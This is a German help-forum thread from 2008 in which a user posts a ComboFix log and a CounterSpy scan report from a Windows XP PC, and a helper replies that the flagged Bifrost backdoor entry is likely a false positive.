+ 2006-08-25 12:20:04 143,360 ----a-w C:\WINDOWS\system32\ffdshow\ff_theora.dll
+ 2006-08-25 12:21:02 45,568 ----a-w C:\WINDOWS\system32\ffdshow\ff_tremor.dll
+ 2006-08-25 12:21:06 38,400 ----a-w C:\WINDOWS\system32\ffdshow\ff_unrar.dll
+ 2006-08-25 12:19:20 26,624 ----a-w C:\WINDOWS\system32\ffdshow\ff_wmv9.dll
+ 2006-08-25 12:36:04 405,504 ----a-w C:\WINDOWS\system32\ffdshow\ff_x264.dll
+ 2005-11-30 03:17:26 5,632 ----a-w C:\WINDOWS\system32\ffdshow\FLT_ffdshow.dll
+ 2006-08-25 13:33:34 1,654,784 ----a-w C:\WINDOWS\system32\ffdshow\libavcodec.dll
+ 2006-08-25 15:25:04 139,264 ----a-w C:\WINDOWS\system32\ffdshow\libmplayer.dll
+ 2006-08-25 12:20:56 245,760 ----a-w C:\WINDOWS\system32\ffdshow\TomsMoComp_ff.dll
+ 2005-12-31 02:10:30 761,856 ----a-w C:\WINDOWS\system32\ffdshow\xvidcore.dll
- 2008-05-20 14:10:34 331,480 ----a-w C:\WINDOWS\system32\FNTCACHE.DAT
+ 2008-05-28 14:24:04 331,480 ----a-w C:\WINDOWS\system32\FNTCACHE.DAT
- 2008-03-01 12:53:52 63,488 ----a-w C:\WINDOWS\system32\icardie.dll
+ 2008-04-23 04:16:29 63,488 ----a-w C:\WINDOWS\system32\icardie.dll
- 2008-02-29 08:54:43 70,656 ----a-w C:\WINDOWS\system32\ie4uinit.exe
+ 2008-04-22 07:39:48 70,656 ----a-w C:\WINDOWS\system32\ie4uinit.exe
- 2008-03-01 12:53:52 153,088 ----a-w C:\WINDOWS\system32\ieakeng.dll
+ 2008-04-23 04:16:29 153,088 ----a-w C:\WINDOWS\system32\ieakeng.dll
- 2008-03-01 12:53:52 230,400 ----a-w C:\WINDOWS\system32\ieaksie.dll
+ 2008-04-23 04:16:29 230,400 ----a-w C:\WINDOWS\system32\ieaksie.dll
- 2008-02-15 05:44:25 161,792 ----a-w C:\WINDOWS\system32\ieakui.dll
+ 2008-04-20 05:07:51 161,792 ----a-w C:\WINDOWS\system32\ieakui.dll
- 2008-03-01 12:53:52 383,488 ----a-w C:\WINDOWS\system32\ieapfltr.dll
+ 2008-04-23 04:16:29 383,488 ----a-w C:\WINDOWS\system32\ieapfltr.dll
- 2008-03-01 12:53:53 384,512 ----a-w C:\WINDOWS\system32\iedkcs32.dll
+ 2008-04-23 04:16:29 384,512 ----a-w C:\WINDOWS\system32\iedkcs32.dll
- 2008-03-01 12:53:56 6,066,176 ----a-w C:\WINDOWS\system32\ieframe.dll
+ 2008-04-23 04:16:30 6,066,176 ----a-w C:\WINDOWS\system32\ieframe.dll
- 2008-03-01 12:53:57 44,544 ----a-w C:\WINDOWS\system32\iernonce.dll
+ 2008-04-23 04:16:30 44,544 ----a-w C:\WINDOWS\system32\iernonce.dll
- 2008-03-01 12:53:57 267,776 ----a-w C:\WINDOWS\system32\iertutil.dll
+ 2008-04-23 04:16:30 267,776 ----a-w C:\WINDOWS\system32\iertutil.dll
- 2008-02-22 10:00:51 13,824 ----a-w C:\WINDOWS\system32\ieudinit.exe
+ 2008-04-22 07:39:58 13,824 ----a-w C:\WINDOWS\system32\ieudinit.exe
- 2008-05-20 14:11:15 224,608 ----a-w C:\WINDOWS\system32\inetsrv\MetaBase.bin
+ 2008-06-16 14:11:02 224,613 ----a-w C:\WINDOWS\system32\inetsrv\MetaBase.bin
+ 2008-03-24 23:28:39 135,168 ----a-w C:\WINDOWS\system32\java.exe
+ 2008-03-24 23:28:43 135,168 ----a-w C:\WINDOWS\system32\javaw.exe
+ 2008-03-25 00:37:01 139,264 ----a-w C:\WINDOWS\system32\javaws.exe
- 2008-03-01 12:53:58 27,648 ----a-w C:\WINDOWS\system32\jsproxy.dll
+ 2008-04-23 04:16:30 27,648 ----a-w C:\WINDOWS\system32\jsproxy.dll
+ 2005-05-24 10:27:16 213,048 ----a-w C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner\kavss.dll
+ 2007-10-21 19:40:14 94,208 ----a-w C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner\kavuninstall.exe
+ 2007-10-21 19:40:16 950,272 ----a-w C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner\kavwebscan.dll
- 2007-11-29 22:30:16 1,044,480 ----a-w C:\WINDOWS\system32\libdivx.dll
+ 2008-05-13 01:51:10 1,044,480 ----a-w C:\WINDOWS\system32\libdivx.dll
- 2008-05-09 21:35:04 16,863,864 ----a-w C:\WINDOWS\system32\MRT.exe
+ 2008-05-29 23:35:11 17,486,968 ----a-w C:\WINDOWS\system32\MRT.exe
- 2006-07-17 00:00:00 297,472 ----a-w C:\WINDOWS\system32\MSCTF.dll
+ 2008-02-26 11:49:00 297,984 ----a-w C:\WINDOWS\system32\msctf.dll
- 2008-03-01 12:53:59 459,264 ----a-w C:\WINDOWS\system32\msfeeds.dll
+ 2008-04-23 04:16:30 459,264 ----a-w C:\WINDOWS\system32\msfeeds.dll
- 2008-03-01 12:53:59 52,224 ----a-w C:\WINDOWS\system32\msfeedsbs.dll
+ 2008-04-23 04:16:30 52,224 ----a-w C:\WINDOWS\system32\msfeedsbs.dll
- 2008-03-01 16:24:04 3,591,680 ----a-w C:\WINDOWS\system32\mshtml.dll
+ 2008-04-23 20:16:32 3,591,680 ----a-w C:\WINDOWS\system32\mshtml.dll
- 2008-03-01 12:54:02 478,208 ----a-w C:\WINDOWS\system32\mshtmled.dll
+ 2008-04-23 04:16:31 478,208 ----a-w C:\WINDOWS\system32\mshtmled.dll
- 2008-03-01 12:54:03 193,024 ----a-w C:\WINDOWS\system32\msrating.dll
+ 2008-04-23 04:16:31 193,024 ----a-w C:\WINDOWS\system32\msrating.dll
- 2008-03-01 12:54:03 671,232 ----a-w C:\WINDOWS\system32\mstime.dll
+ 2008-04-23 04:16:31 671,232 ----a-w C:\WINDOWS\system32\mstime.dll
+ 2007-05-15 13:43:10 1,320,800 ----a-w C:\WINDOWS\system32\msxml6.dll
+ 2005-09-07 23:03:50 86,728 ----a-w C:\WINDOWS\system32\msxml6r.dll
- 2008-03-01 12:54:03 102,912 ----a-w C:\WINDOWS\system32\occache.dll
+ 2008-04-23 04:16:31 102,912 ----a-w C:\WINDOWS\system32\occache.dll
- 2008-05-20 12:03:45 149,198 ----a-w C:\WINDOWS\system32\perfc007.dat
+ 2008-06-16 06:40:44 148,482 ----a-w C:\WINDOWS\system32\perfc007.dat
- 2008-05-20 12:03:45 121,090 ----a-w C:\WINDOWS\system32\perfc009.dat
+ 2008-06-16 06:40:44 120,416 ----a-w C:\WINDOWS\system32\perfc009.dat
- 2008-05-20 12:03:45 599,538 ----a-w C:\WINDOWS\system32\perfh007.dat
+ 2008-06-16 06:40:44 597,862 ----a-w C:\WINDOWS\system32\perfh007.dat
- 2008-05-20 12:03:45 548,270 ----a-w C:\WINDOWS\system32\perfh009.dat
+ 2008-06-16 06:40:44 547,596 ----a-w C:\WINDOWS\system32\perfh009.dat
- 2007-11-13 08:48:36 278,528 ----a-w C:\WINDOWS\system32\pncrt.dll
+ 2008-05-23 10:36:14 278,528 ----a-w C:\WINDOWS\system32\pncrt.dll
- 2007-11-13 08:48:43 6,656 ----a-w C:\WINDOWS\system32\pndx5016.dll
+ 2008-05-23 10:36:23 6,656 ----a-w C:\WINDOWS\system32\pndx5016.dll
- 2007-11-13 08:48:43 5,632 ----a-w C:\WINDOWS\system32\pndx5032.dll
+ 2008-05-23 10:36:23 5,632 ----a-w C:\WINDOWS\system32\pndx5032.dll
- 2008-03-01 12:54:04 44,544 ----a-w C:\WINDOWS\system32\pngfilt.dll
+ 2008-04-23 04:16:31 44,544 ----a-w C:\WINDOWS\system32\pngfilt.dll
- 2007-10-29 22:42:30 1,293,312 ----a-w C:\WINDOWS\system32\quartz.dll
+ 2008-05-07 05:14:45 1,293,312 ----a-w C:\WINDOWS\system32\quartz.dll
- 2007-11-13 08:49:19 185,688 ----a-w C:\WINDOWS\system32\rmoc3260.dll
+ 2008-05-23 10:36:48 185,944 ----a-w C:\WINDOWS\system32\rmoc3260.dll
- 2006-10-08 20:51:14 14,640 ------w C:\WINDOWS\system32\spmsg.dll
+ 2007-11-30 11:18:34 18,808 ------w C:\WINDOWS\system32\spmsg.dll
+ 2008-05-30 12:54:38 11,776 ----a-w C:\WINDOWS\system32\spool\drivers\w32x86\2\ACTFAX.DLL
+ 2008-05-30 08:16:28 72,912 ----a-w C:\WINDOWS\system32\spool\drivers\w32x86\2\RASDD.DLL
+ 2008-05-30 08:16:28 71,440 ----a-w C:\WINDOWS\system32\spool\drivers\w32x86\2\RASDDUI.DLL
+ 2008-05-30 12:54:38 11,776 ----a-w C:\WINDOWS\system32\spool\drivers\w32x86\ActFax.dll
+ 2008-05-30 08:16:28 72,912 ----a-w C:\WINDOWS\system32\spool\drivers\w32x86\RASDD.DLL
+ 2008-05-30 08:16:28 71,440 ----a-w C:\WINDOWS\system32\spool\drivers\w32x86\RASDDUI.DLL
- 2007-11-29 22:30:16 200,704 ----a-w C:\WINDOWS\system32\ssldivx.dll
+ 2008-05-13 01:51:10 200,704 ----a-w C:\WINDOWS\system32\ssldivx.dll
- 2008-03-01 12:54:04 105,984 ----a-w C:\WINDOWS\system32\url.dll
+ 2008-04-23 04:16:31 105,984 ----a-w C:\WINDOWS\system32\url.dll
- 2008-03-01 12:54:04 1,159,680 ----a-w C:\WINDOWS\system32\urlmon.dll
+ 2008-04-23 04:16:31 1,159,680 ----a-w C:\WINDOWS\system32\urlmon.dll
- 2008-03-01 12:54:05 233,472 ----a-w C:\WINDOWS\system32\webcheck.dll
+ 2008-04-23 04:16:32 233,472 ----a-w C:\WINDOWS\system32\webcheck.dll
- 2008-03-01 12:54:05 826,368 ----a-w C:\WINDOWS\system32\wininet.dll
+ 2008-04-23 04:16:32 826,368 ----a-w C:\WINDOWS\system32\wininet.dll
+ 2006-03-31 10:39:24 62,672 ----a-w C:\WINDOWS\system32\xinput1_1.dll
+ 2005-12-05 16:07:30 61,136 ----a-w C:\WINDOWS\system32\xinput9_1_0.dll
.
-- Snapshot reset to current date --
.
(((((((((((((((((((((((((((( Autostart Punkte der Registrierung ))))))))))))))))))))))))))))))))))))))))
.
.
REGEDIT4
*Hinweis* leere Eintrage & legitime Standardeintrage werden nicht angezeigt.

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\ctfmon.exe" [2006-07-17 02:00 15360]
"DeskCalc"="c:\programme\deskcalc pro\deskcalc.exe" [2006-07-25 19:58 2797568]
"Voipwise"="C:\Programme\Voipwise.com\Voipwise\Voipwise.exe" [2007-09-06 11:24 7394608]
"RoboForm"="C:\Programme\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe" [2007-10-30 14:26 160592]
"L08DXLRD_20610375"="C:\Programme\Microsoft Lernen und Wissen\Microsoft Encarta 2008 – Lernen und Wissen DVD\EDICT.exe" [ ]
"SandboxieControl"="D:\Programme\Sandboxie\SbieCtrl.exe" [2008-04-27 15:22 512512]
"WMPNSCFG"="C:\Programme\Windows Media Player\WMPNSCFG.exe" [2006-11-03 09:56 204288]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ledpointer"="CNYHKey.exe" [2004-03-02 20:24 5576704 C:\WINDOWS\CNYHKey.exe]
"Google Desktop Search"="C:\Programme\Google\Google Desktop Search\GoogleDesktop.exe" [2007-08-14 09:11 1838592]
"SoundMan"="SOUNDMAN.EXE" [2005-06-20 21:42 77824 C:\WINDOWS\SOUNDMAN.EXE]
"OSSelectorReinstall"="C:\Programme\Gemeinsame Dateien\Acronis\Acronis Disk Director\oss_reinstall.exe" [2006-04-12 15:15 1261475]
"Babylon Client"="C:\Programme\Babylon\Babylon-Pro\Babylon.exe" [2006-12-13 16:15 2785256]
"NvCplDaemon"="C:\WINDOWS\system32\NvCpl.dll" [2005-07-20 21:07 7110656]
"Outpost Firewall"="C:\Programme\Agnitum\Outpost Firewall\outpost.exe" [2007-04-05 16:56 94720]
"OutpostFeedBack"="C:\Programme\Agnitum\Outpost Firewall\feedback.exe" [2007-06-28 13:18 335872]
"egui"="C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe" [2008-03-13 16:48 1443072]
"QuickTime Task"="C:\Programme\QuickTime\qttask.exe" [2007-02-16 10:54 282624]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\CTFMON.EXE" [2006-07-17 02:00 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"NoResolveTrack"= 0 (0x0)
"NoFileAssociate"= 0 (0x0)

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"vidc.yv12"= yv12vfw.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Notification Packages REG_MULTI_SZ scecli scecli scecli

[HKLM\~\startupfolder\C:^Dokumente und Einstellungen^All Users^Startmenü^Programme^Autostart^Adobe Acrobat - Schnellstart.lnk]
backup=C:\WINDOWS\pss\Adobe Acrobat - Schnellstart.lnkCommon Startup

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Acrobat Assistant 7.0]
--a------ 2008-04-23 02:08 483328 C:\Programme\Adobe\Acrobat 7.0\Distillr\Acrotray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NvCplDaemon]
--a------ 2005-07-20 21:07 7110656 C:\WINDOWS\system32\NvCpl.dll

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run-]
"Window Washer"=C:\Programme\Webroot\Washer\wwDisp.exe
"BitTorrent"="C:\Programme\BitTorrent\bittorrent.exe" --force_start_minimized
"updateMgr"=C:\Programme\Adobe\Acrobat 7.0\Acrobat\AdobeUpdateManager.exe AcPro7_0_5 -reboot 1
"Skype"="C:\Programme\Skype\Phone\Skype.exe" /nosplash /minimized
"WMPNSCFG"=C:\Programme\Windows Media Player\WMPNSCFG.exe
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMBgMonitor.exe"
"SecurityLayer"=C:\Programme\trustDesk\SecurityLayer.exe -autostart
"Voipwise"="C:\Programme\Voipwise.com\Voipwise\Voipwise.exe" -nosplash -minimized
"swg"=C:\Programme\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"RealTray"=C:\Programme\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
"Acrobat Assistant 7.0"="C:\Programme\Adobe\Acrobat 7.0\Distillr\Acrotray.exe"
"Acronis Scheduler2 Service"="C:\Programme\Gemeinsame Dateien\Acronis\Schedule2\schedhlp.exe"
"QuickTime Task"="C:\Programme\QuickTime\qttask.exe" -atboottime
"PCMService"="C:\Programme\CyberLink\PowerCinema\PCMService.exe"
"Ulead AutoDetector v2"=C:\Programme\Gemeinsame Dateien\Ulead Systems\AutoDetector\monitor.exe
"SMSERIAL"=sm56hlpr.exe
"RemoteControl"=C:\Programme\CyberLink\PowerDVD\PDVDServ.exe
"TkBellExe"="C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe" -osboot
"USBToolTip"="C:\Programme\Pinnacle\Shared Files\Programs\USBTip\USBTip.exe"
"TrueImageMonitor.exe"=C:\Programme\Acronis\TrueImageHome\TrueImageMonitor.exe
"AcronisTimounterMonitor"=C:\Programme\Acronis\TrueImageHome\TimounterMonitor.exe
"GrooveMonitor"="C:\Programme\Microsoft Office\Office12\GrooveMonitor.exe"
"NvCplDaemon"=RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
"NvMediaCenter"=RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
"PWRISOVM.EXE"=C:\Programme\PowerISO\PWRISOVM.EXE
"hpppta"=C:\Programme\Hewlett-Packard\HP PrecisionScan\PrecisionScan Pro\hpppta.exe /ICON
"nwiz"=nwiz.exe /install
"NVRaidService"=C:\WINDOWS\system32\nvraidservice.exe
"HP Update 5370C"=D:\SAFE\Scanner\hpupdate.exe 5370C+
"SecurityLayer"=C:\Programme\trustDesk\securitylayer.exe
"NeroFilterCheck"=C:\Programme\Gemeinsame Dateien\Ahead\Lib\NeroCheck.exe
"InCD"=C:\Programme\Nero\Nero 7\InCD\InCD.exe
"Realtime Audio Engine"="mmrtkrnl.exe" /i
"CHotkey"=mHotkey.exe
"SunJavaUpdateSched"="C:\Programme\Java\jre1.6.0_06\bin\jusched.exe"

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"C:\\Programme\\LimeWire\\LimeWire.exe"=
"C:\\Programme\\Voipwise.com\\Voipwise\\Voipwise.exe"=
"C:\\Programme\\IBP 9\\IBP.exe"=
"C:\\Programme\\Skype\\Phone\\Skype.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\IcmpSettings]
"AllowInboundEchoRequest"= 1 (0x1)

R1 bizVSerial;Franson VSerial;C:\WINDOWS\system32\drivers\bizVSerialNT.sys [2007-05-31 08:38]
R1 epfwtdir;epfwtdir;C:\WINDOWS\system32\DRIVERS\epfwtdir.sys [2008-03-13 16:52]
R1 HCW88AUD;Hauppauge WinTV 88x Audio Capture;C:\WINDOWS\system32\drivers\hcw88aud.sys [2005-05-31 12:34]
R1 rsct_bus;REINER SCT PC/SC Bus;C:\WINDOWS\system32\DRIVERS\rsct_bus.sys [2004-09-10 17:35]
R1 VFILT;Outpost Firewall Kernel Driver;C:\Programme\Agnitum\Outpost Firewall\kernel\FILTNT.SYS [2007-04-05 16:56]
R2 AcuWVSSchedulerv5;Acunetix WVS Scheduler v5;"C:\Programme\Acunetix\Web Vulnerability Scanner 5\WVSScheduler.exe" [2007-06-21 16:31]
R2 Prvflder;Prvflder;C:\WINDOWS\system32\DRIVERS\prvflder.sys [2006-04-21 09:22]
R3 ADBLOCK.DLL;Outpost Firewall PlugIn (ADBLOCK.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\ADBLOCK.DLL [2007-04-05 16:57]
R3 ARP.DLL;Outpost Firewall PlugIn (ARP.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\ARP.DLL [2007-04-05 16:57]
R3 cjusb;REINER SCT cyberJack pinpad/e-com USB;C:\WINDOWS\system32\DRIVERS\cjusb.sys [2007-05-31 08:38]
R3 CONTENT.DLL;Outpost Firewall PlugIn (CONTENT.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\CONTENT.DLL [2007-04-05 16:57]
R3 DNSCACHE.DLL;Outpost Firewall PlugIn (DNSCACHE.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\DNSCACHE.DLL [2007-04-05 16:57]
R3 FTPFILT.DLL;Outpost Firewall PlugIn (FTPFILT.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\FTPFILT.DLL [2007-04-05 16:57]
R3 HCW88BDA;Hauppauge WinTV 88x DVB Tuner/Demod;C:\WINDOWS\system32\drivers\hcw88bda.sys [2005-05-31 12:34]
R3 HCW88TSE;Hauppauge WinTV 88x MPEG/TS Capture;C:\WINDOWS\system32\drivers\hcw88tse.sys [2005-05-31 15:43]
R3 HCW88TUNE;Hauppauge WinTV 88x Tuner;C:\WINDOWS\system32\drivers\hcw88tun.sys [2005-05-31 12:34]
R3 hcw88vid;Hauppauge WinTV 88x Video;C:\WINDOWS\system32\drivers\hcw88vid.sys [2005-05-31 15:43]
R3 HCW88XBAR;Hauppauge WinTV 88x Crossbar;C:\WINDOWS\system32\drivers\HCW88BAR.sys [2005-05-31 12:34]
R3 HTMLFILT.DLL;Outpost Firewall PlugIn (HTMLFILT.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\HTMLFILT.DLL [2007-04-05 16:57]
R3 HTTPFILT.DLL;Outpost Firewall PlugIn (HTTPFILT.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\HTTPFILT.DLL [2007-04-05 16:57]
R3 IMAPFILT.DLL;Outpost Firewall PlugIn (IMAPFILT.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\IMAPFILT.DLL [2007-04-05 16:57]
R3 IMT0521;Inmax USB IMT-0521 Smartcard Reader;C:\WINDOWS\system32\Drivers\IMT0521.sys [2003-07-11 09:50]
R3 MAILFILT.DLL;Outpost Firewall PlugIn (MAILFILT.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\MAILFILT.DLL [2007-04-05 16:57]
R3 NNTPFILT.DLL;Outpost Firewall PlugIn (NNTPFILT.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\NNTPFILT.DLL [2007-04-05 16:57]
R3 POP3FILT.DLL;Outpost Firewall PlugIn (POP3FILT.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\POP3FILT.DLL [2007-04-05 16:57]
R3 PROTECT.DLL;Outpost Firewall PlugIn (PROTECT.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\PROTECT.DLL [2007-04-05 16:57]
R3 SbieDrv;SbieDrv;D:\Programme\Sandboxie\SbieDrv.sys [2008-04-27 15:22]
R3 SECRET.DLL;Outpost Firewall PlugIn (SECRET.DLL);C:\Programme\Agnitum\Outpost Firewall\kernel\SECRET.DLL [2007-04-05 16:57]
S3 ActiveFaxServiceNT;ActiveFax-Server-Dienst;C:\Programme\ActiveFax\Server\ActSrvNT.exe [2008-05-30 14:54]
S3 cjpcsc;cyberJack PC/SC COM Service ;C:\WINDOWS\system32\cjpcsc.exe [2008-01-07 13:19]
S3 ITSPrinterService;IT Solution Signature Printer;C:\Programme\trustDesk\plugins\printer\itsprintersrv.exe [2007-04-16 22:06]
S3 motccgp;Motorola USB Composite Device Driver;C:\WINDOWS\system32\DRIVERS\motccgp.sys [2007-11-02 15:36]
S3 motccgpfl;MotCcgpFlService;C:\WINDOWS\system32\DRIVERS\motccgpfl.sys [2007-01-22 20:33]
S3 rsct_dev;REINER PC/SC SmartCard Reader Device Driver;C:\WINDOWS\system32\DRIVERS\rsct_dev.sys [2004-09-23 13:12]
S3 SCR33X USB Smart Card Reader;SCR33X USB Smart Card Reader;C:\WINDOWS\system32\DRIVERS\SCR33X2K.sys [2003-12-03 04:22]
S3 trustLogon;trustLogon;"C:\Programme\trustDesk\plugins\logon\trustlogon.exe" [2007-01-23 12:35]
S3 wwEngineSvc;Window Washer Engine;C:\Programme\Webroot\Washer\WasherSvc.exe [2007-11-26 15:47]
S4 MSSQL$PRISO;MSSQL$PRISO;C:\Programme\Priso Datenbank\MSSQL$PRISO\Binn\sqlservr.exe [2002-12-17 17:55]
S4 SQLAgent$PRISO;SQLAgent$PRISO;C:\Programme\Priso Datenbank\MSSQL$PRISO\Binn\sqlagent.EXE [2002-12-17 17:23]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5f859054-10cc-11da-b357-009027bfa409}]
\Shell\AutoRun\command - E:\Autorun.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{63b57571-157e-11da-acd9-000feaece007}]
\Shell\AutoRun\command - M:\Setup.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{ada67554-186e-11da-8373-000feaece007}]
\Shell\AutoRun\command - L:\Setup.exe

.
Inhalt des "geplante Tasks" Ordners
"2008-06-16 14:00:00 C:\WINDOWS\Tasks\1-Click Maintenance.job"
- C:\Programme\TuneUp Utilities 2008\OneClickStarter.exe
"2008-06-15 19:39:15 C:\WINDOWS\Tasks\User_Feed_Synchronization-{4FBD8FD6-1383-42F4-B3B8-6C1FF9715BF1}.job"
- C:\WINDOWS\system32\msfeedssync.exe
"2008-06-16 06:35:20 C:\WINDOWS\Tasks\XoftSpySE 2.job"
- C:\Programme\XoftSpySE\XoftSpy.exe
"2008-05-31 09:04:58 C:\WINDOWS\Tasks\XoftSpySE.job"
- C:\Programme\XoftSpySE\XoftSpy.exe
"2006-10-29 14:03:04 C:\WINDOWS\Tasks\_viceversapr2_task_BackUp.job"
- C:\Programme\ViceVersa Pro 2\ViceVersa.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-16 16:11:19
Windows 5.1.2600 Service Pack 2 NTFS

Scanne versteckte Prozesse...

Scanne versteckte Autostart Eintr„ge...

Scanne versteckte Dateien...

Scan erfolgreich abgeschlossen
versteckte Dateien: 0

**************************************************************************
.
--------------------- DLLs Loaded Under Running Processes ---------------------

PROCESS: C:\WINDOWS\explorer.exe
-> C:\programme\deskcalc pro\CalcHook.dll
.
------------------------ Other Running Processes ------------------------
.
C:\Programme\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\system32\scardsvr.exe
C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Programme\FolderSize\FolderSizeSvc.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\nvsvc32.exe
D:\Programme\Sandboxie\SbieSvc.exe
C:\WINDOWS\system32\tcpsvcs.exe
C:\Programme\Microsoft Lernen und Wissen\Microsoft Encarta 2008 D:\Programme\Sandboxie\SbieCtrl.exe
C:\Programme\Adobe\Acrobat 7.0\Acrobat\Acrobat_sl.exe
.
**************************************************************************
.
Zeit der Fertigstellung: 2008-06-16 16:18:11 - machine was rebooted
ComboFix-quarantined-files.txt 2008-06-16 14:17:50
ComboFix2.txt 2008-05-20 15:27:58
ComboFix3.txt 2008-05-20 14:20:41
ComboFix4.txt 2008-05-20 11:06:52
ComboFix5.txt 2008-05-19 18:08:10

27 Verzeichnis(se), 80,434,642,944 Bytes frei
34 Verzeichnis(se), 80,511,094,784 Bytes frei

636 --- E O F --- 2008-06-13 21:02:20

von CounterSpy: Bifrost Backdoor macht mich nervös!

Sagt dir dieses Programm was?
C:\Programme\Voipwise.com\Voipwise\Voipwise.exe

das ein gewöhnliches VOIP-Programm

Scan History Details
Start Date: 16.06.2008 17:19:59
End Date: 16.06.2008 17:50:32
Total Time: 30 Min 33 Sec
Detected security risks

KaZaA P2P Program more information...
Details: KaZaA is a peer-to-peer (P2P) application that allows its users to join together in a network via the Internet and share files from each other's hard drives.
Status: Deleted

Registry entries detected
HKEY_USERS\S-1-5-21-164601823-2529933474-2537397741-1006\SOFTWARE\KAZAA
HKEY_USERS\S-1-5-21-164601823-2529933474-2537397741-1006\SOFTWARE\KAZAA\LocalContent

Bifrost Backdoor more information...
Details: Bifrost is an advanced remote administration tool that allows users to remotely control computers that are behind firewalls and routers.
Status: Deleted

Registry entries detected
HKEY_USERS\S-1-5-21-164601823-2529933474-2537397741-1006\SOFTWARE\WGET

Yazzle Components Misc (General) more information...
Details: Yazzle Components includes software that is used by multiple applications from Clickspring, LLC, the authors of Yazzle applications such as Yazzle Sudoku, Cowabanga and Snowball Wars.
Status: Deleted

Registry entries detected
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MODULEUSAGE\C:/WINDOWS/DOWNLOADED PROGRAM FILES/YAZZLEACTIVEX.OCX
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MODULEUSAGE\C:/WINDOWS/DOWNLOADED PROGRAM FILES/YAZZLEACTIVEX.OCX
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MODULEUSAGE\C:/WINDOWS/DOWNLOADED PROGRAM FILES/YAZZLEACTIVEX.OCX
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MODULEUSAGE\C:/WINDOWS/SYSTEM32/MFC42.DLL
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MODULEUSAGE\C:/WINDOWS/SYSTEM32/OLEPRO32.DLL

Trojan-Downloader.Win32.Agent.aww Trojan Downloader more information...
Status: Deleted

Files detected
C:\WINDOWS\swxcacls.exe

Cookie: Tracking Cookies Cookie (General) more information...
Details: Cookies are small "data tags" that web sites store on PCs in order to recognize unique visitors. Cookies are used to identify returning visitors who have registered for special services; to measure and analyze visitors' use of web site features; to count unique visitors to web pages; and to allow web surfers to use virtual "shopping carts." Online advertising networks use cookies to track users across web sites and to measure ad impressions and click-throughs.
Status: Deleted

Cookies detected
c:\dokumente und einstellungen\robert\cookies\robert@ad.yieldmanager[1].txt
c:\dokumente und einstellungen\robert\cookies\robert@doubleclick[1].txt
c:\dokumente und einstellungen\robert\cookies\robert@hitbox[2].txt
c:\dokumente und einstellungen\robert\cookies\robert@statcounter[1].txt
c:\dokumente und einstellungen\robert\cookies\robert@statcounter[2].txt
c:\dokumente und einstellungen\robert\cookies\robert@zedo[1].txt

Zitat

17.06.2008, 00:14

Sabina

Ehrenmitglied

Beiträge: 29434

#4 Hallo zzi

Bifrost Backdoor und SOFTWARE\KAZAA ... ist meiner Ansicht nach obligatorischer Einträge von Counterspy, dennoch sollten wir nicht meckern, er hat immerhin einiges rausgeholt.
Das Problem sollte behoben sein, oder kommen noch popups ?

